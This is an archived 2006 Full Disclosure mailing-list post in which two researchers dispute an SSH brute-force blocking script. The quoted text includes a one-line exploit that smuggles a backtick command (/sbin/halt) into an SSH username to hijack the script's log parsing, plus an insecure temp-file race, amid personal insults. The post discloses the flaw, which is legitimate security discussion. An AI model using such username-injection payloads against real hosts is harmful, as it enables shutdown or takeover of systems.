Full Disclosure mailing list archives

Re: SSH brute force blocking tool

From: "J. Oquendo" <sil () infiltrated net>
Date: Mon, 27 Nov 2006 16:12:11 -0500

Tavis Ormandy wrote:
On Mon, Nov 27, 2006 at 03:51:39PM -0500, J. Oquendo wrote:
Tavis Ormandy wrote:
Nice work, really subtle rootkit. I like the email phone-home.

Here's an exploit.

#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim

Since you seem to be clueless I'll answer step by step. Here goes idiot. (Sinful to see someone so clueless coming from Gentoo... Guess it goes with the romper room Linux territory)
/////
awk '/error retrieving/{getline;print $13}' /var/log/secure|sort -ru >> /tmp/hosts.deny

insecure temporary file creation, race condition if a user can create
that file between the unlink and the open.

$ ssh "error retrieving"@localhost & ssh '`0wn3d`'@localhost
$ awk '/error retrieving/{getline;print $13}' /var/log/authlog
`0wn3d`

Oops.

Thanks, Tavis.

So again dumbass...

Look at the script. Although YOU'RE opening /var/log/authlog what is the script opening. Please tell me you're really not that stupid. And if someone else decided to modify this script, what does that have to do with what I posted. How exactly is my script a backdoor as you claim. Enquiring minds want to know this since you claim its a backdoor. Please tell me outside of your modification how this is going to backdoor someone.

--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743